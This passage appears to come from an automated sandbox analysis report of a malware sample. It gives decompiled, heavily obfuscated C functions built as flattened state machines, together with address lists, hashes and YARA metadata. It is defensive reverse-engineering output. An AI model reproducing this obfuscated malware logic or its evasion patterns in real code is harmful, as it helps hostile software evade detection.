				_v572 = _v572 * 0x24;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x0007943f;
				_v536 = 0xc9a576;
				_v536 = _v536 + 0xffff9d44;
				_v536 = _v536 ^ 0x00c7b609;
				_v596 = 0xae9ff5;
				_v596 = _v596 + 0xffff6f16;
				_v596 = _v596 / _t248;
				_v596 = _v596 ^ 0xfe5a1390;
				_v596 = _v596 ^ 0xfe515394;
				_v588 = 0xa8ac90;
				_t249 = 0x17;
				_v588 = _v588 / _t249;
				_v588 = _v588 << 4;
				_v588 = _v588 + 0xfffff77b;
				_v588 = _v588 ^ 0x007f9eed;
				_v600 = 0xc58072;
				_v600 = _v600 + 0xffffcbc9;
				_v600 = _v600 << 4;
				_v600 = _v600 * 0x72;
				_v600 = _v600 ^ 0x7db93259;
				_v604 = 0x4fbb0c;
				_v604 = _v604 << 0xa;
				_v604 = _v604 << 7;
				_v604 = _v604 * 0x27;
				_v604 = _v604 ^ 0xfda02730;
				_v544 = 0x5fc89d;
				_v544 = _v544 | 0x6496792e;
				_v544 = _v544 ^ 0x64dc06aa;
				_v580 = 0xa4bd54;
				_v580 = _v580 + 0xffff47e7;
				_v580 = _v580 >> 0x10;
				_v580 = _v580 + 0xffff9f11;
				_v580 = _v580 ^ 0xfff905b7;
				_v560 = 0x8ec0a6;
				_v560 = _v560 ^ 0x51bd2871;
				_t250 = 0x75;
				_v560 = _v560 / _t250;
				_v560 = _v560 ^ 0x00b97c8d;
				_v584 = 0x6990b8;
				_v584 = _v584 ^ 0x9d650ba3;
				_v584 = _v584 ^ 0x6675860f;
				_v584 = _v584 + 0xffff1bcf;
				_v584 = _v584 ^ 0xfb748c23;
				_v592 = 0xef0f92;
				_v592 = _v592 ^ 0x945975ed;
				_v592 = _v592 + 0xffff8646;
				_v592 = _v592 + 0xfffff2e1;
				_v592 = _v592 ^ 0x94bb4d80;
				_v552 = 0xcb75d7;
				_t251 = 0x65;
				_v552 = _v552 * 0x6f;
				_v552 = _v552 ^ 0xe1e1c84b;
				_v552 = _v552 ^ 0xb9d9c47b;
				_v576 = 0x1cf321;
				_v576 = _v576 + 0xffffc0e0;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 7;
				_v576 = _v576 ^ 0x000d9bab;
				_v532 = 0x45ea0d;
				_v532 = _v532 / _t251;
				_v532 = _v532 ^ 0x000fbf52;
				_v540 = 0x89573e;
				_v540 = _v540 + 0xffffd980;
				_v540 = _v540 ^ 0x008ac7ea;
				do {
					while(_t217 != 0x2095a83) {
						if(_t217 == 0x3550051) {
							_t217 = 0xca1b903;
							continue;
						} else {
							if(_t217 == 0xba5f136) {
								_t210 = E02AF09DD(_v560,  &_v524, _v584, _v592);
								 *_t210 = 0;
								_t217 = 0x2095a83;
								continue;
							} else {
								_t260 = _t217 - 0xca1b903;
								if(_t217 == 0xca1b903) {
									_push(_v556);
									_push(_v548);
									_push(_v564);
									_t211 = E02AFE1F8(0x2ae1000, _v528, _t260);
									_t224 =  *0x2b06214; // 0x0
									_t213 =  *0x2b06214; // 0x0
									E02B02D0A(_v572, _t260, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
									_t210 = E02AFFECB(_t211, _v600, _v604, _v544, _v580);
									_t254 =  &(_t254[0xe]);
									_t217 = 0xba5f136;
									continue;
								}
							}
						}
						goto L9;
					}
					E02AF437A(E02AFBEFD, _v552, _v576, _v532, _v540, 0,  &_v524,  &_v524);
					_t254 =  &(_t254[6]);
					_t217 = 0x9325c58;
					L9:
					__eflags = _t217 - 0x9325c58;
				} while (__eflags != 0);
				return _t210;
			}




































                                                                                                          0x02af4f74
                                                                                                          0x02af4f7a
                                                                                                          0x02af4f84
                                                                                                          0x02af4f8c
                                                                                                          0x02af4f91
                                                                                                          0x02af4f99
                                                                                                          0x02af4fa1
                                                                                                          0x02af4fa6
                                                                                                          0x02af4fae
                                                                                                          0x02af4fb6
                                                                                                          0x02af4fbe
                                                                                                          0x02af4fc6
                                                                                                          0x02af4fce
                                                                                                          0x02af4fe0
                                                                                                          0x02af4fe5
                                                                                                          0x02af4feb
                                                                                                          0x02af4ff0
                                                                                                          0x02af4ff8
                                                                                                          0x02af5004
                                                                                                          0x02af5009
                                                                                                          0x02af500f
                                                                                                          0x02af5014
                                                                                                          0x02af501c
                                                                                                          0x02af5029
                                                                                                          0x02af502c
                                                                                                          0x02af5030
                                                                                                          0x02af5035
                                                                                                          0x02af503d
                                                                                                          0x02af5045
                                                                                                          0x02af504d
                                                                                                          0x02af5055
                                                                                                          0x02af505d
                                                                                                          0x02af506d
                                                                                                          0x02af5071
                                                                                                          0x02af5079
                                                                                                          0x02af5081
                                                                                                          0x02af508d
                                                                                                          0x02af5090
                                                                                                          0x02af5094
                                                                                                          0x02af5099
                                                                                                          0x02af50a1
                                                                                                          0x02af50a9
                                                                                                          0x02af50b1
                                                                                                          0x02af50b9
                                                                                                          0x02af50c3
                                                                                                          0x02af50c7
                                                                                                          0x02af50cf
                                                                                                          0x02af50d7
                                                                                                          0x02af50dc
                                                                                                          0x02af50e6
                                                                                                          0x02af50ea
                                                                                                          0x02af50f2
                                                                                                          0x02af50fa
                                                                                                          0x02af5102
                                                                                                          0x02af510a
                                                                                                          0x02af5112
                                                                                                          0x02af511a
                                                                                                          0x02af511f
                                                                                                          0x02af5127
                                                                                                          0x02af512f
                                                                                                          0x02af5139
                                                                                                          0x02af5151
                                                                                                          0x02af5156
                                                                                                          0x02af515c
                                                                                                          0x02af5169
                                                                                                          0x02af5171
                                                                                                          0x02af5179
                                                                                                          0x02af5181
                                                                                                          0x02af5189
                                                                                                          0x02af5191
                                                                                                          0x02af5199
                                                                                                          0x02af51a1
                                                                                                          0x02af51a9
                                                                                                          0x02af51b1
                                                                                                          0x02af51b9
                                                                                                          0x02af51c6
                                                                                                          0x02af51c7
                                                                                                          0x02af51cb
                                                                                                          0x02af51d3
                                                                                                          0x02af51db
                                                                                                          0x02af51e3
                                                                                                          0x02af51eb
                                                                                                          0x02af51f0
                                                                                                          0x02af51f5
                                                                                                          0x02af51fd
                                                                                                          0x02af520b
                                                                                                          0x02af520f
                                                                                                          0x02af5217
                                                                                                          0x02af521f
                                                                                                          0x02af5227
                                                                                                          0x02af522f
                                                                                                          0x02af522f
                                                                                                          0x02af523d
                                                                                                          0x02af52f2
                                                                                                          0x00000000
                                                                                                          0x02af5243
                                                                                                          0x02af5249
                                                                                                          0x02af52df
                                                                                                          0x02af52e8
                                                                                                          0x02af52eb
                                                                                                          0x00000000
                                                                                                          0x02af524f
                                                                                                          0x02af524f
                                                                                                          0x02af5251
                                                                                                          0x02af5257
                                                                                                          0x02af5260
                                                                                                          0x02af5264
                                                                                                          0x02af526c
                                                                                                          0x02af5271
                                                                                                          0x02af5293
                                                                                                          0x02af52a6
                                                                                                          0x02af52bd
                                                                                                          0x02af52c2
                                                                                                          0x02af52c5
                                                                                                          0x00000000
                                                                                                          0x02af52c5
                                                                                                          0x02af5251
                                                                                                          0x02af5249
                                                                                                          0x00000000
                                                                                                          0x02af523d
                                                                                                          0x02af5316
                                                                                                          0x02af531b
                                                                                                          0x02af531e
                                                                                                          0x02af5320
                                                                                                          0x02af5320
                                                                                                          0x02af5320
                                                                                                          0x02af5332

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: E$X\2
                                                                                                          • API String ID: 0-703089088
                                                                                                          • Opcode ID: d941829788290e1d8d0e25494687def4da34c255125b396e82db271dceb670fa
                                                                                                          • Instruction ID: e87407addb52b888067c46b3bdd69ba369eaf312e08d903fb9ab3fec34cd3e44
                                                                                                          • Opcode Fuzzy Hash: d941829788290e1d8d0e25494687def4da34c255125b396e82db271dceb670fa
                                                                                                          • Instruction Fuzzy Hash: 669142715083809FC368CF65D88951BBBF2FBC5398F504A1DF29696260D3B58A49CF87
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEDE74, Relevance: 2.7, Strings: 2, Instructions: 193COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AEDE74() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr _t196;
				void* _t201;
				char _t202;
				signed int* _t203;
				void* _t205;

				_t203 =  &_v92;
				_v48 = 0x569f20;
				_v48 = _v48 * 0x6b;
				_t169 = 0;
				_v48 = _v48 ^ 0x2435b753;
				_t201 = 0xa773912;
				_v36 = 0xa39ca1;
				_v36 = _v36 + 0xffff508a;
				_v36 = _v36 ^ 0x00aa5884;
				_v84 = 0x943e6a;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x5d77;
				_t171 = 0x78;
				_v84 = _v84 * 0xe;
				_v84 = _v84 ^ 0x0005cfbb;
				_v72 = 0x1e0d0a;
				_v72 = _v72 | 0x4cfb6fde;
				_v72 = _v72 + 0xffff94ff;
				_v72 = _v72 ^ 0x4cfa3edf;
				_v80 = 0xa086f6;
				_v80 = _v80 << 0x10;
				_v80 = _v80 >> 5;
				_v80 = _v80 + 0xffff18d5;
				_v80 = _v80 ^ 0x0432d7e2;
				_v68 = 0xb8dd27;
				_v68 = _v68 | 0xebb7bfbf;
				_v68 = _v68 ^ 0xebb8c1a9;
				_v32 = 0x418b74;
				_v32 = _v32 * 0x7e;
				_v32 = _v32 ^ 0x2049f6fa;
				_v64 = 0x577cf5;
				_v64 = _v64 * 0x64;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x004a237d;
				_v76 = 0x4c7ee;
				_v76 = _v76 ^ 0x14a6b669;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x4a231390;
				_v44 = 0xd26523;
				_v44 = _v44 | 0x7504cc1f;
				_v44 = _v44 ^ 0x75d3d950;
				_v88 = 0x7e3e67;
				_v88 = _v88 >> 5;
				_v88 = _v88 + 0xfffffc49;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x000c6abf;
				_v40 = 0x647ef6;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00028bbb;
				_v92 = 0x531e5a;
				_v92 = _v92 << 8;
				_v92 = _v92 | 0xbedf5cfb;
				_v92 = _v92 ^ 0xffdbb821;
				_v52 = 0xaf5b7e;
				_v52 = _v52 ^ 0x54b2eb64;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x0a8e907d;
				_v56 = 0x7e69cb;
				_t172 = 0x76;
				_v56 = _v56 / _t172;
				_v56 = _v56 + 0xffff7440;
				_v56 = _v56 ^ 0x00047804;
				_v60 = 0x4d1deb;
				_v60 = _v60 | 0x7db56f6d;
				_v60 = _v60 + 0xffff2308;
				_v60 = _v60 ^ 0x7dffdcf4;
				_t200 = _v28;
				_t202 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t201 - 0xa773912;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t201 = 0xa19a195;
							continue;
						}
						if(_t201 == 0x6df88bf) {
							E02AE54B6(_v52, _v56, _v60, _t200);
							L25:
							return _t169;
						}
						if(_t201 == 0x82168a7) {
							E02B02B09(_v88, _v24, _v40, _v92);
							_t201 = 0x6df88bf;
							continue;
						}
						if(_t201 == 0x88022e2) {
							_t196 =  *0x2b06214; // 0x0
							E02AFE0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
							_t162 =  *0x2b06214; // 0x0
							_t203 =  &(_t203[3]);
							_t169 = 1;
							_t201 = 0x82168a7;
							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
							continue;
						}
						if(_t201 != 0xa19a195) {
							goto L22;
						} else {
							_t202 = E02AEC307();
							_t201 = 0xf928839;
							continue;
						}
					}
					if(_t201 == 0xbfd8a94) {
						if(E02AEE640(_v32, _v64,  &_v24,  &_v16) == 0) {
							_t201 = 0x82168a7;
							goto L22;
						}
						_t201 = 0x88022e2;
						goto L1;
					}
					if(_t201 == 0xeffcd22) {
						_t201 = 0x6df88bf;
						if(_v28 > 2) {
							_t166 = E02AFF840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
							_v24 = _t166;
							if(_t166 != 0) {
								_t201 = 0xbfd8a94;
							}
						}
						goto L1;
					}
					if(_t201 != 0xf928839) {
						goto L22;
					}
					_t168 = E02AF8C7D(_t202, _v36,  &_v28, _v84, _v72);
					_t200 = _t168;
					_t203 =  &(_t203[3]);
					if(_t168 == 0) {
						goto L25;
					}
					_t201 = 0xeffcd22;
					goto L1;
					L22:
				} while (_t201 != 0x8019399);
				goto L25;
			}




































                                                                                                          0x02aede74
                                                                                                          0x02aede77
                                                                                                          0x02aede8a
                                                                                                          0x02aede8e
                                                                                                          0x02aede90
                                                                                                          0x02aede98
                                                                                                          0x02aede9d
                                                                                                          0x02aedea5
                                                                                                          0x02aedead
                                                                                                          0x02aedeb5
                                                                                                          0x02aedebd
                                                                                                          0x02aedec2
                                                                                                          0x02aeded1
                                                                                                          0x02aeded4
                                                                                                          0x02aeded8
                                                                                                          0x02aedee0
                                                                                                          0x02aedee8
                                                                                                          0x02aedef0
                                                                                                          0x02aedef8
                                                                                                          0x02aedf00
                                                                                                          0x02aedf08
                                                                                                          0x02aedf0d
                                                                                                          0x02aedf12
                                                                                                          0x02aedf1a
                                                                                                          0x02aedf22
                                                                                                          0x02aedf2a
                                                                                                          0x02aedf32
                                                                                                          0x02aedf3a
                                                                                                          0x02aedf47
                                                                                                          0x02aedf4b
                                                                                                          0x02aedf53
                                                                                                          0x02aedf60
                                                                                                          0x02aedf6c
                                                                                                          0x02aedf70
                                                                                                          0x02aedf78
                                                                                                          0x02aedf80
                                                                                                          0x02aedf88
                                                                                                          0x02aedf8d
                                                                                                          0x02aedf95
                                                                                                          0x02aedf9d
                                                                                                          0x02aedfa5
                                                                                                          0x02aedfad
                                                                                                          0x02aedfb5
                                                                                                          0x02aedfba
                                                                                                          0x02aedfc2
                                                                                                          0x02aedfc7
                                                                                                          0x02aedfcf
                                                                                                          0x02aedfd7
                                                                                                          0x02aedfdc
                                                                                                          0x02aedfe4
                                                                                                          0x02aedfec
                                                                                                          0x02aedff1
                                                                                                          0x02aedff9
                                                                                                          0x02aee001
                                                                                                          0x02aee009
                                                                                                          0x02aee011
                                                                                                          0x02aee016
                                                                                                          0x02aee01e
                                                                                                          0x02aee02a
                                                                                                          0x02aee02d
                                                                                                          0x02aee031
                                                                                                          0x02aee039
                                                                                                          0x02aee041
                                                                                                          0x02aee049
                                                                                                          0x02aee051
                                                                                                          0x02aee059
                                                                                                          0x02aee061
                                                                                                          0x02aee065
                                                                                                          0x02aee065
                                                                                                          0x02aee069
                                                                                                          0x02aee069
                                                                                                          0x02aee069
                                                                                                          0x02aee069
                                                                                                          0x02aee06f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aee075
                                                                                                          0x02aee116
                                                                                                          0x00000000
                                                                                                          0x02aee116
                                                                                                          0x02aee081
                                                                                                          0x02aee1f3
                                                                                                          0x02aee1fd
                                                                                                          0x02aee203
                                                                                                          0x02aee203
                                                                                                          0x02aee08d
                                                                                                          0x02aee105
                                                                                                          0x02aee10c
                                                                                                          0x00000000
                                                                                                          0x02aee10c
                                                                                                          0x02aee095
                                                                                                          0x02aee0c1
                                                                                                          0x02aee0d4
                                                                                                          0x02aee0d9
                                                                                                          0x02aee0e4
                                                                                                          0x02aee0e7
                                                                                                          0x02aee0e8
                                                                                                          0x02aee0ed
                                                                                                          0x00000000
                                                                                                          0x02aee0ed
                                                                                                          0x02aee09d
                                                                                                          0x00000000
                                                                                                          0x02aee0a3
                                                                                                          0x02aee0ac
                                                                                                          0x02aee0ae
                                                                                                          0x00000000
                                                                                                          0x02aee0ae
                                                                                                          0x02aee09d
                                                                                                          0x02aee126
                                                                                                          0x02aee1c7
                                                                                                          0x02aee1d3
                                                                                                          0x00000000
                                                                                                          0x02aee1d3
                                                                                                          0x02aee1c9
                                                                                                          0x00000000
                                                                                                          0x02aee1c9
                                                                                                          0x02aee132
                                                                                                          0x02aee174
                                                                                                          0x02aee179
                                                                                                          0x02aee18f
                                                                                                          0x02aee194
                                                                                                          0x02aee19c
                                                                                                          0x02aee1a2
                                                                                                          0x02aee1a2
                                                                                                          0x02aee19c
                                                                                                          0x00000000
                                                                                                          0x02aee179
                                                                                                          0x02aee13a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aee153
                                                                                                          0x02aee158
                                                                                                          0x02aee15a
                                                                                                          0x02aee15f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aee165
                                                                                                          0x00000000
                                                                                                          0x02aee1d8
                                                                                                          0x02aee1d8
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: g>~$}#J
                                                                                                          • API String ID: 0-4030106083
                                                                                                          • Opcode ID: 4bbdf18deab3cc54259a7398e461aff39514cc46451a4d5007d602836d862588
                                                                                                          • Instruction ID: 5d9197c410c096e8cfd5e8774207d85adf52f2624de672988af0ace788b64db5
                                                                                                          • Opcode Fuzzy Hash: 4bbdf18deab3cc54259a7398e461aff39514cc46451a4d5007d602836d862588
                                                                                                          • Instruction Fuzzy Hash: E19154718083418FCB58CF65D58541BFBF1BB94368F504A2EF89A96260C7B5CA4ACF87
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEE7DE, Relevance: 2.7, Strings: 2, Instructions: 191COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02AEE7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t180;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t194;
				signed int* _t212;
				signed int* _t215;

				_t212 = _a8;
				_push(_a12);
				_t211 = _a4;
				_push(_t212);
				_push(_a4);
				_push(__ecx);
				E02AFFE29(_t159);
				_v88 = 0xa74a92;
				_t215 =  &(( &_v128)[5]);
				_v88 = _v88 + 0x6289;
				_v88 = _v88 ^ 0x00a7ad1b;
				_t194 = 0x98d5ac6;
				_v72 = 0xabb696;
				_v72 = _v72 + 0xffffe542;
				_v72 = _v72 ^ 0x00a9fc0a;
				_v120 = 0x8dd565;
				_v120 = _v120 + 0xffff1d47;
				_v120 = _v120 + 0x56a1;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x46a17a82;
				_v124 = 0x8aacb4;
				_t189 = 0x6e;
				_v124 = _v124 / _t189;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x000ba54e;
				_v76 = 0x9f90a6;
				_v76 = _v76 | 0x682faec6;
				_v76 = _v76 ^ 0x68b53021;
				_v80 = 0xfbe8ab;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0xbe8fb9cd;
				_v84 = 0x1efa1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0009eae4;
				_v92 = 0xb2d03c;
				_v92 = _v92 ^ 0x8bcf93b7;
				_v92 = _v92 ^ 0x8b76d684;
				_v100 = 0x2cdd15;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x00bdfcd6;
				_v104 = 0x2a00e4;
				_v104 = _v104 | 0x603c2e46;
				_v104 = _v104 + 0xffff11ee;
				_v104 = _v104 ^ 0x6032c829;
				_v128 = 0xd0d9f9;
				_v128 = _v128 + 0x4e1d;
				_t190 = 0x14;
				_v128 = _v128 * 0x58;
				_v128 = _v128 / _t190;
				_v128 = _v128 ^ 0x0398a77e;
				_v68 = 0x2cfb4c;
				_t191 = 0x67;
				_v68 = _v68 / _t191;
				_v68 = _v68 ^ 0x000f6b94;
				_v112 = 0x1ddb62;
				_v112 = _v112 + 0x6002;
				_v112 = _v112 << 2;
				_v112 = _v112 + 0xe88d;
				_v112 = _v112 ^ 0x0072622d;
				_v116 = 0x4c27f5;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 | 0x0ee4ea1c;
				_v116 = _v116 * 0x4e;
				_v116 = _v116 ^ 0x89b93018;
				_v108 = 0x73a5e7;
				_v108 = _v108 * 0x7d;
				_v108 = _v108 >> 1;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x3c03dbf2;
				_v64 = 0x20f8;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0009aa09;
				_v96 = 0x5991b1;
				_v96 = _v96 | 0x807a0890;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x03d0ebbf;
				do {
					while(_t194 != 0x8b4e35) {
						if(_t194 == 0x2701dd5) {
							E02AFCAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
							_t215 =  &(_t215[3]);
							_t194 = 0x8b4e35;
							continue;
						} else {
							if(_t194 == 0x3d33b80) {
								_push(_t194);
								_push(_t194);
								_t180 = E02AEC5D8(_t212[1]);
								_t215 =  &(_t215[3]);
								 *_t212 = _t180;
								__eflags = _t180;
								if(__eflags != 0) {
									_t194 = 0x48381f5;
									continue;
								}
							} else {
								if(_t194 == 0x48381f5) {
									E02AE22A6(_t212, _v80,  &_v60, _v84);
									_t215 =  &(_t215[2]);
									_t194 = 0xae51dd8;
									continue;
								} else {
									if(_t194 == 0x62374bf) {
										_t212[1] = E02AF5333(_t211);
										_t194 = 0x3d33b80;
										continue;
									} else {
										if(_t194 == 0x98d5ac6) {
											_t194 = 0x62374bf;
											 *_t212 =  *_t212 & 0x00000000;
											_t212[1] = _v88;
											continue;
										} else {
											if(_t194 != 0xae51dd8) {
												goto L16;
											} else {
												E02AF0A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
												_t215 =  &(_t215[4]);
												_t194 = 0x2701dd5;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E02AFCAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
					_t215 =  &(_t215[3]);
					_t194 = 0x462b9b2;
					L16:
					__eflags = _t194 - 0x462b9b2;
				} while (__eflags != 0);
				L17:
				__eflags =  *_t212;
				_t158 =  *_t212 != 0;
				__eflags = _t158;
				return 0 | _t158;
			}





























                                                                                                          0x02aee7e7
                                                                                                          0x02aee7ef
                                                                                                          0x02aee7f6
                                                                                                          0x02aee7fd
                                                                                                          0x02aee7fe
                                                                                                          0x02aee800
                                                                                                          0x02aee801
                                                                                                          0x02aee806
                                                                                                          0x02aee80e
                                                                                                          0x02aee811
                                                                                                          0x02aee81b
                                                                                                          0x02aee823
                                                                                                          0x02aee828
                                                                                                          0x02aee830
                                                                                                          0x02aee838
                                                                                                          0x02aee840
                                                                                                          0x02aee848
                                                                                                          0x02aee850
                                                                                                          0x02aee858
                                                                                                          0x02aee85d
                                                                                                          0x02aee865
                                                                                                          0x02aee873
                                                                                                          0x02aee878
                                                                                                          0x02aee87e
                                                                                                          0x02aee883
                                                                                                          0x02aee887
                                                                                                          0x02aee88f
                                                                                                          0x02aee897
                                                                                                          0x02aee89f
                                                                                                          0x02aee8a7
                                                                                                          0x02aee8af
                                                                                                          0x02aee8b4
                                                                                                          0x02aee8bc
                                                                                                          0x02aee8c4
                                                                                                          0x02aee8c9
                                                                                                          0x02aee8d1
                                                                                                          0x02aee8d9
                                                                                                          0x02aee8e1
                                                                                                          0x02aee8e9
                                                                                                          0x02aee8f9
                                                                                                          0x02aee8fe
                                                                                                          0x02aee906
                                                                                                          0x02aee90e
                                                                                                          0x02aee916
                                                                                                          0x02aee91e
                                                                                                          0x02aee926
                                                                                                          0x02aee92e
                                                                                                          0x02aee93b
                                                                                                          0x02aee93e
                                                                                                          0x02aee94a
                                                                                                          0x02aee94e
                                                                                                          0x02aee956
                                                                                                          0x02aee962
                                                                                                          0x02aee965
                                                                                                          0x02aee969
                                                                                                          0x02aee971
                                                                                                          0x02aee979
                                                                                                          0x02aee981
                                                                                                          0x02aee986
                                                                                                          0x02aee98e
                                                                                                          0x02aee996
                                                                                                          0x02aee99e
                                                                                                          0x02aee9a8
                                                                                                          0x02aee9ba
                                                                                                          0x02aee9be
                                                                                                          0x02aee9c6
                                                                                                          0x02aee9d3
                                                                                                          0x02aee9d7
                                                                                                          0x02aee9db
                                                                                                          0x02aee9e0
                                                                                                          0x02aee9e8
                                                                                                          0x02aee9f0
                                                                                                          0x02aee9f5
                                                                                                          0x02aee9fd
                                                                                                          0x02aeea05
                                                                                                          0x02aeea0d
                                                                                                          0x02aeea12
                                                                                                          0x02aeea1a
                                                                                                          0x02aeea1a
                                                                                                          0x02aeea2c
                                                                                                          0x02aeeb00
                                                                                                          0x02aeeb05
                                                                                                          0x02aeeb08
                                                                                                          0x00000000
                                                                                                          0x02aeea32
                                                                                                          0x02aeea38
                                                                                                          0x02aeead4
                                                                                                          0x02aeead5
                                                                                                          0x02aeead9
                                                                                                          0x02aeeade
                                                                                                          0x02aeeae1
                                                                                                          0x02aeeae3
                                                                                                          0x02aeeae5
                                                                                                          0x02aeeae7
                                                                                                          0x00000000
                                                                                                          0x02aeeae7
                                                                                                          0x02aeea3e
                                                                                                          0x02aeea40
                                                                                                          0x02aeeab2
                                                                                                          0x02aeeab7
                                                                                                          0x02aeeaba
                                                                                                          0x00000000
                                                                                                          0x02aeea42
                                                                                                          0x02aeea44
                                                                                                          0x02aeea96
                                                                                                          0x02aeea99
                                                                                                          0x00000000
                                                                                                          0x02aeea46
                                                                                                          0x02aeea4c
                                                                                                          0x02aeea85
                                                                                                          0x02aeea87
                                                                                                          0x02aeea8a
                                                                                                          0x00000000
                                                                                                          0x02aeea4e
                                                                                                          0x02aeea54
                                                                                                          0x00000000
                                                                                                          0x02aeea5a
                                                                                                          0x02aeea72
                                                                                                          0x02aeea77
                                                                                                          0x02aeea7a
                                                                                                          0x00000000
                                                                                                          0x02aeea7a
                                                                                                          0x02aeea54
                                                                                                          0x02aeea4c
                                                                                                          0x02aeea44
                                                                                                          0x02aeea40
                                                                                                          0x02aeea38
                                                                                                          0x00000000
                                                                                                          0x02aeea2c
                                                                                                          0x02aeeb27
                                                                                                          0x02aeeb2c
                                                                                                          0x02aeeb2f
                                                                                                          0x02aeeb34
                                                                                                          0x02aeeb34
                                                                                                          0x02aeeb34
                                                                                                          0x02aeeb40
                                                                                                          0x02aeeb42
                                                                                                          0x02aeeb47
                                                                                                          0x02aeeb47
                                                                                                          0x02aeeb51

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -br$F.<`
                                                                                                          • API String ID: 0-3678315648
                                                                                                          • Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
                                                                                                          • Instruction ID: 2beae73b29acda7bb7a1765047a78b8c9ff0e5e8ddb8603b8e295544dc3b5835
                                                                                                          • Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
                                                                                                          • Instruction Fuzzy Hash: 76914EB15083819FC758CF64CA8992BBBF1FBD4758F00891DF68696260D7B19A49CF83
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF654A, Relevance: 2.7, Strings: 2, Instructions: 157COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 91%
